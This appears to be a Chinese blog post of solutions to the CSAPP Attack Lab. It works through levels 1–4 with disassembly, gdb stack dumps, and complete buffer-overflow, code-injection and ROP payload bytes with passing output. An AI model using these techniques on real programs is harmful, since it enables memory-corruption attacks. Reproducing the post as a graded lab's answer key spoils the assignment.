zoukankan      html  css  js  c++  java
  • 【CSAPP】Attack Lab实验笔记





    0000000000401968 <test>:
      401968:	48 83 ec 08          	sub    $0x8,%rsp
      40196c:	b8 00 00 00 00       	mov    $0x0,%eax
      401971:	e8 32 fe ff ff       	callq  4017a8 <getbuf>
      401976:	89 c2                	mov    %eax,%edx
      401978:	be 88 31 40 00       	mov    $0x403188,%esi
      40197d:	bf 01 00 00 00       	mov    $0x1,%edi
      401982:	b8 00 00 00 00       	mov    $0x0,%eax
      401987:	e8 64 f4 ff ff       	callq  400df0 <__printf_chk@plt>
      40198c:	48 83 c4 08          	add    $0x8,%rsp
      401990:	c3                   	retq   
      401991:	90                   	nop
    00000000004017a8 <getbuf>:
      4017a8:	48 83 ec 28          	sub    $0x28,%rsp
      4017ac:	48 89 e7             	mov    %rsp,%rdi
      4017af:	e8 8c 02 00 00       	callq  401a40 <Gets>
      4017b4:	b8 01 00 00 00       	mov    $0x1,%eax
      4017b9:	48 83 c4 28          	add    $0x28,%rsp
      4017bd:	c3                   	retq   
      4017be:	90                   	nop
      4017bf:	90                   	nop
    00000000004017c0 <touch1>:
      4017c0:	48 83 ec 08          	sub    $0x8,%rsp
      4017c4:	c7 05 0e 2d 20 00 01 	movl   $0x1,0x202d0e(%rip)        # 6044dc <vlevel>
      4017cb:	00 00 00 
      4017ce:	bf c5 30 40 00       	mov    $0x4030c5,%edi
      4017d3:	e8 e8 f4 ff ff       	callq  400cc0 <puts@plt>
      4017d8:	bf 01 00 00 00       	mov    $0x1,%edi
      4017dd:	e8 ab 04 00 00       	callq  401c8d <validate>
      4017e2:	bf 00 00 00 00       	mov    $0x0,%edi
      4017e7:	e8 54 f6 ff ff       	callq  400e40 <exit@plt>

    0x4017b9打个断点,这时候创建了内容为This is a test str.的文本文件in.txt,在gdb里用set args -qi in.txt指定为输入源.让程序运行到断点,查看栈帧信息

    (gdb) x/60xb 0x5561dc78
    0x5561dc78:     0x54    0x68    0x69    0x73    0x20    0x69    0x73    0x20
    0x5561dc80:     0x61    0x20    0x74    0x65    0x73    0x74    0x20    0x73
    0x5561dc88:     0x74    0x72    0x2e    0x00    0x00    0x00    0x00    0x00
    0x5561dc90:     0x00    0x00    0x00    0x00    0x00    0x00    0x00    0x00
    0x5561dc98:     0x00    0x60    0x58    0x55    0x00    0x00    0x00    0x00
    0x5561dca0:     0x76    0x19    0x40    0x00    0x00    0x00    0x00    0x00
    0x5561dca8:     0x09    0x00    0x00    0x00    0x00    0x00    0x00    0x00
    0x5561dcb0:     0x24    0x1f    0x40    0x00
    (gdb) x/s 0x5561dc78
    0x5561dc78:     "This is a test str."

    这里面的0x76 0x19 0x40对应的就是返回地址,我们的目标就是把它修改为touch1入口的地址0x004017c0.换成机器码就是0xc0 0x17 0x40 0x00,注意是倒序哦.

    54 54 54 54 54 54 54 54
    54 54 54 54 54 54 54 54
    54 54 54 54 54 54 54 54
    54 54 54 54 54 54 54 54
    54 54 54 54 54 54 54 54
    c0 17 40 00 00 00 00


    ./hex2raw < exploit.txt > raw.txt


    ./ctarget -qi raw.txt
    Cookie: 0x59b997fa
    Touch1!: You called touch1()
    Valid solution for level 1 with target ctarget
    PASS: Would have posted the following:
    	user id	bovik
    	course	15213-f15
    	lab	attacklab
    	result	1:PASS:0xffffffff:ctarget:1:54 54 ..... 54 C0 17 40 00 00 00 00 

    level 2


    void touch2(unsigned val)
    	vlevel = 2;       /*Part of validation protocol*/
    	if (val == cookie) {
    		printf("Touch2!: You called touch2(0x%.8x)
    ", val);
    	else {
    		printf("Misfire: You called touch2(0x%.8x)
    ", val);


    mov cookie,%rdi
    pushq touch2


    movq $0x59b997fa,%rdi
    pushq $0x4017ec


    gcc -c ex.s
    objdump -d ex.o > ex_dump.txt


    ex.o:     文件格式 elf64-x86-64
    Disassembly of section .text:
    0000000000000000 <.text>:
       0:	48 c7 c7 fa 97 b9 59 	mov    $0x59b997fa,%rdi
       7:	68 ec 17 40 00       	pushq  $0x4017ec
       c:	c3


    48 c7 c7 fa 97 b9 59 68
    ec 17 40 00 c3 00 00 00
    00 00 00 00 00 00 00 00
    00 00 00 00 00 00 00 00
    00 00 00 00 00 00 00 00
    78 dc 61 55 00 00 00 00


    ./hex2raw < exploit.txt > raw.txt
    ./ctarget -qi raw.txt
    Cookie: 0x59b997fa
    Touch2!: You called touch2(0x59b997fa)
    Valid solution for level 2 with target ctarget
    PASS: Would have posted the following:
    	user id	bovik
    	course	15213-f15
    	lab	attacklab
    	result	1:PASS:0xffffffff:ctarget:2:48 C7 C7 FA 97 B9 59 68
     EC 17 40 00 C3 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
     00 00 00 00 00 00 00 00 00 00 00 78 DC 61 55 00 00 00 00 

    level 3


    /*Compare string to hex represention of unsigned value*/
    int hexmatch(unsigned val, char*sval)
    	char cbuf[110];
    	/*Make position of check string unpredictable*/
    	char*s = cbuf + random() % 100;
    	sprintf(s, "%.8x", val);
    	return strncmp(sval, s, 9) == 0;
    void touch3(char*sval)
    	vlevel = 3;       
    	/*Part of validation protocol*/
    	if (hexmatch(cookie, sval)) {
    		printf("Touch3!: You called touch3("%s")
    ", sval);
    	else {
    		printf("Misfire: You called touch3("%s")
    ", sval);

    有了第二关的经验,这关就很简单了,先仿照hexmatch求出cookie对应的十六进制字符串35 39 62 39 39 37 66 61 0,然后把它塞到栈里,再把这个地址塞进rdi里.这里我把它塞到了0x5561dca8

    movq $0x5561dca8,%rdi
    pushq $0x4018fa
    48 c7 c7 a8 dc 61 55 68
    fa 18 40 00 c3 00 00 00
    00 00 00 00 00 00 00 00
    00 00 00 00 00 00 00 00
    00 00 00 00 00 00 00 00
    78 dc 61 55 00 00 00 00
    35 39 62 39 39 37 66 61


    Cookie: 0x59b997fa
    Touch3!: You called touch3("59b997fa")
    Valid solution for level 3 with target ctarget
    PASS: Would have posted the following:
    	user id	bovik
    	course	15213-f15
    	lab	attacklab
    	result	1:PASS:0xffffffff:ctarget:3:48 C7 C7 A8 DC 61 55 68 
    FA 18 40 00 C3 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 
    00 00 00 00 00 00 00 00 00 00 00 78 DC 61 55 00 00 00 00 35 39 
    62 39 39 37 66 61 00 

    level 4


    movq $cookie,%rdi
    ret touch2


    popq %reg1
    movq %reg1,%reg2
    movq %reg2,%reg3
    movq %regN,%rdi
    ret touchw


    movq %rax,%rdi
    movq %rsp,%rax
    popq %rax


    popq rax => movq rax,rdi


    00 00 00 00 00 00 00 00
    00 00 00 00 00 00 00 00
    00 00 00 00 00 00 00 00
    00 00 00 00 00 00 00 00
    00 00 00 00 00 00 00 00
    ab 19 40 00 00 00 00 00
    fa 97 b9 59 00 00 00 00
    c5 19 40 00 00 00 00 00
    ec 17 40 00 00 00 00 00


    Cookie: 0x59b997fa
    Touch2!: You called touch2(0x59b997fa)
    Valid solution for level 2 with target rtarget
    PASS: Would have posted the following:
    	user id	bovik
    	course	15213-f15
    	lab	attacklab
    	result	1:PASS:0xffffffff:rtarget:2:00 00 00 00 00 00 00 00
     00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
     00 00 00 00 00 00 00 00 00 00 00 AB 19 40 00 00 00 00 00 FA 97
     B9 59 00 00 00 00 C5 19 40 00 00 00 00 00 EC 17 40 00 00 00 00
     00 00 

    level 5

    这一关就是体力活了,如讲义里所讲,这关并没有出现啥新机制,只是复杂版的level 4,不做也行.
    随机栈虽然厉害,但只要通过ROP拿到了%rsp,照样是能被破解的.而上一关我们就提到了movq %rsp,%rax,在加上还有个lea (%rdi,%rsi,1),%rax,以及三十多个mov,所以解题思路就很明显了.

  • 相关阅读:
    cf689d ST表RMQ+二分
    hdu5289 ST表+二分
    hdu5443 ST表裸题:求区间最大
    poj3264 倍增法(ST表)裸题
    cf932d 树上倍增
    zoj3195 联通树上三个点的路径长
    hdu6107 倍增法st表
    hdu2586 lca倍增法
    poj1470 LCA倍增法
  • 原文地址:https://www.cnblogs.com/kangyupl/p/13057508.html
Copyright © 2011-2022 走看看